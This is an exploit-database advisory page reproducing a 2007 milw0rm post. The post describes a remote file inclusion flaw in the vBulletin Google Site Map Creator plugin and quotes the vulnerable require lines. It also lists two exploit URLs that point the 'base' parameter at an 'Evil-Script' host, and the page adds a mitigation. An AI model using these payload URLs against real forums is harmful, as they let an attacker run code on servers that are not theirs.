header-logo
Suggest Exploit
vendor:
Google Site Map Creator
by:
Host4vb.com & Cold z3ro
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Google Site Map Creator
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

vBulletin Google Site Map Creator (base) Remote File Include Vulnerability

The vBulletin Google Site Map Creator script is vulnerable to remote file inclusion. This vulnerability allows an attacker to include and execute arbitrary files from remote servers, potentially leading to remote code execution.

Mitigation:

Upgrade to a patched version of the script or apply a security patch provided by the vendor. Ensure that input validation and sanitization are implemented to prevent remote file inclusion vulnerabilities.
Source

Exploit-DB raw data:

=============================================

vBulletin Google Site Map Creator (base) Remote File Include Vulnerability

=============================================
Found by : Host4vb.com & Cold z3ro
Contact : Admin@host4vb.com , Cold-z3ro@hotmail.com
Homepage : Host4vb.com , Hack-Teach.Org
=============================================
Script : http://forum.time2dine.co.nz/seo-vbulletin/vbulletin-google-site-map-3976.html
=============================================
File :
/vbgsitemap-vbseo.php  <=  Line 5
require $base."includes/functions_vbseo.php";
=============================================
File :
/vbgsitemap-config.php <= Line 139
require $base."includes/config.php";
=============================================
Exploit :
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?base=Evil-Script?
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?base=Evil-Script?
==============================================
Greets To : Xp10.com , Hack-Teach Members , All Arabs Hosting , Sniper-sa.com , sm4host.com
Thanx: Mohandko , Alkomandoz Hacker , Mogatil , The Viper , The Wolf Ksa , Dr.Exe , Pro Hackers
Thanx: Green eyas amor , Titanichacker , hacaaar , Hack Back , Mohammad Sallah , Unix Hacker
       RoMaNcYxHaCkEr , mR wEsAm X , Mr.E-vil
Thanx: Team Hell Members (ConviCt & jEdDaWi & Black Shell & Hackers Cool & Dr.killer & Red Hat)

# milw0rm.com [2007-05-25]

Navigation

Suggest Exploit

Services By CQR